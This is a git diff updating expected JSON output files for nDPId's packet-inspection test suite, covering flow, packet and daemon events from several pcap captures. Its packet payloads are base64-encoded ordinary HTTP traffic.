+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":135,"packets-processed":135,"total-skipped-flows":0,"total-l4-data-len":5105,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1614898324173} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 135/135 diff --git a/test/results/http-crash-content-disposition.pcap.out b/test/results/http-crash-content-disposition.pcap.out index 3e3052f77..ea7dd0e7c 100644 --- a/test/results/http-crash-content-disposition.pcap.out +++ b/test/results/http-crash-content-disposition.pcap.out @@ -1,36 +1,24 @@ 00481{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1492518365663} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365663} -00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365767} -00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365789} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809} -00919{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":480,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":480,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAB4NS9QABABvS\/wKgAZ66BAArH4wBQe0Wpb5FXH2uAGADlVxoAAAEBCAoAFH3uK6FboVBPU1QgL2ltZXNzYWdlcy5waHA\/c29uZ2lmeV9hPTNoMjQ4Zklid0ombmV3IEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMjIwDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTV2N0xoYm5hMnJld0hyajBlX0Y4d3IwV0FWVHBZOTNFVDlpUUhEeQ0KSG9zdDoga2h1LnNoDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBBcGFjaGUtSHR0cENsaWVudC9VTkFWQUlMQUJMRSAoamF2YSAxLjQpDQoNCi0tNXY3TGhibmEycmV3SHJqMGVfRjh3cjBXQVZUcFk5M0VUOWlRSER5DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImlzYW5kcm9pZCINCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD1VUy1BU0NJSQ0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogOGJpdA0KDQox"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809} -00407{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAY9S+QABABvY7wKgAZ66BAArH4wBQe0WrG5FXH2uAGADlbXAAAAEBCAoAFH3uK6FboQ0KLS01djdMaGJuYTJyZXdIcmowZV9GOHdyMFdBVlRwWTkzRVQ5aVFIRHktLQ0K"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN0QAAtBpq1roEACsCoAGcAUMfjkVcfa3tFqxuAEAB6YXsAAAEBCAoroVwyABR97g=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN1QAAtBpq0roEACsCoAGcAUMfjkVcfa3tFq0qAEAB6YUsAAAEBCAoroVwzABR97g=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968} -02271{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1492,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1492,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAF1EN2QAAtBpUTroEACsCoAGcAUMfjkVcfa3tFq0qAEAB6GowAAAEBCAoroVxpABR97khUVFAvMS4xIDIwMCBPSw0KU2VydmVyOiBuZ2lueA0KRGF0ZTogVHVlLCAxOCBBcHIgMjAxNyAxMjoxOToyNSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpYLVBvd2VyZWQtQnk6IFBIUC81LjMuMw0KQ29udGVudC1MZW5ndGg6IDIxODcNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KPGltc2dzPgo8dGltZXN0YW1wPjEzNTgyNzg0NTA8L3RpbWVzdGFtcD4KPGZyZXF1ZW50bHlfc2hvdz4zPC9mcmVxdWVudGx5X3Nob3c+CjxmcmVxdWVudGx5X3Nob3dfZmlyc3Q+MzwvZnJlcXVlbnRseV9zaG93X2ZpcnN0Pgo8bWVzc2FnZV9saXN0PgoJPG1lc3NhZ2U+CgkJPGlkPjE4PC9pZD4KCQk8dGl0bGU+RnJvbSBCcnVubyBNYXJzIHRvIFJpaGFubmE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5QbGF5IHRoZSBob3R0ZXN0IHNvbmdzIGVmZm9ydGxlc3NseSBvbiB0aGUgIzEgcGlhbm8gYXBwITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vYXBpLnNtdWxlLmNvbS92Mi9yZWRpcmVjdC9leUozWldKVmNtd2lPaUpvZEhSd09pOHZjR3hoZVM1bmIyOW5iR1V1WTI5dEwzTjBiM0psTDJGd2NITXZaR1YwWVdsc2N6OXBaRngxTURBelpHTnZiUzV6YlhWc1pTNXRZV2RwWTNCcFlXNXZJaXdpYlc5aWFXeGxWWEpzSWpvaWJXRnlhMlYwT2k4dlpHVjBZV2xzY3o5cFpGeDFNREF6WkdOdmJTNXpiWFZzWlM1dFlXZHBZM0JwWVc1dklpd2lZMkZ0Y0dGcFoyNUpaQ0k2TVRReU1pd2lZWEJ3SWpvaVRVbE9TVkJKUVU1UFgwRk9SRkpQU1VRaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDUxMzc2MzQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4xNzwvaWQ+CgkJPHRpdGxlPkRvd25sb2FkIFNpbmchIEthcmFva2UgZm9yIEZSRUU8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5TaW5nIHNvbmdzIGJ5IDFELCBDYXJseSBSYWUgSmVwc2VuLCBCaWViZXIgJmFtcDsgbW9yZSE8L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1YzJsdVoyRnVaSEp2YVdRaUxDSnRiMkpwYkdWVmNtd2lPaUp0WVhKclpYUTZMeTlrWlhSaGFXeHpQMmxrWEhVd01ETmtZMjl0TG5OdGRXeGxMbk5wYm1kaGJtUnliMmxrSWl3aVkyRnRjR0ZwWjI1SlpDSTZNVEV4T0N3aVlYQndJam9pVTBsT1IxOUhUMDlIVEVVaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjY3NzM5MA=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968} -01585{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":981,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":981,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAD1UN3QAAtBpcRroEACsCoAGcAUMfjkVclC3tFq0qAGAB6wJEAAAEBCAoroVxpABR97jQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMDwvaWQ+CgkJPHRpdGxlPkEgUGVwIFRhbGsgZnJvbSBLaWQgUHJlc2lkZW50ITwvdGl0bGU+CgkJPGRlc2NyaXB0aW9uPldhdGNoIHRoZSBuZXdlc3QgdmlkZW8gZnJvbSBUaGUgR3JlZ29yeSBCcm90aGVycywgYW5kIHBlcmZvcm0geW91ciBvd24gcmVuZGl0aW9uITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9bkZHY3JZUGRySlU8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYzNTQyNDg8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMTwvaWQ+CgkJPHRpdGxlPlJhcCBsaWtlIEVtaW5lbSE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5BdXRvUmFwIHR1cm5zIHNwZWVjaCBpbnRvIHJhcCAoYW5kIGNvcnJlY3RzIGJhZCByYXBwaW5nKS48L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1WVhWMGIzSmhjQ0lzSW0xdlltbHNaVlZ5YkNJNkltMWhjbXRsZERvdkwyUmxkR0ZwYkhNL2FXUmNkVEF3TTJSamIyMHVjMjExYkdVdVlYVjBiM0poY0NJc0ltTmhiWEJoYVdkdVNXUWlPakUxTVRNc0ltRndjQ0k2SWtGVlZFOVNRVkJmUjA5UFJ5Sjk8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYwNzU0MDI8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KPC9tZXNzYWdlX2xpc3Q+CjwvaW1zZ3M+"} -00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1492518365968} +00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492518365663,"flow_last_seen":1492518365663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492518365663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492518365663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365663,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492518365767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365767,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492518365789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1492518365789,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="} +00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492518365663,"flow_last_seen":1492518365809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1492518365809,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"khu.sh","url":"khu.sh\/imessages.php?songify_a=3h248fIbwJ&new","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492518365663,"flow_last_seen":1492518365968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2844,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1492518365968,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-data-len":2844,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492518365968} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 9/0 +~~ packets captured/processed: 9/9 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 0 -~~ total active/idle flows...: 0/0 +~~ total layer4 data length..: 2844 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5099937 bytes -~~ total memory freed........: 5099937 bytes -~~ total allocations/frees...: 113310/113310 +~~ total memory allocated....: 5101178 bytes +~~ total memory freed........: 5101178 bytes +~~ total allocations/frees...: 113326/113326 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 201 chars -~~ json string max len.......: 2276 chars -~~ json string avg len.......: 1195 chars +~~ json string min len.......: 475 chars +~~ json string max len.......: 844 chars +~~ json string avg len.......: 643 chars diff --git a/test/results/http-lines-split.pcap.out b/test/results/http-lines-split.pcap.out index 0ecb0f504..331063bf9 100644 --- a/test/results/http-lines-split.pcap.out +++ b/test/results/http-lines-split.pcap.out @@ -1,11 +1,11 @@ 00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-lines-split.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593713340401} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593713340401,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1593713340401,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"} -00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}} 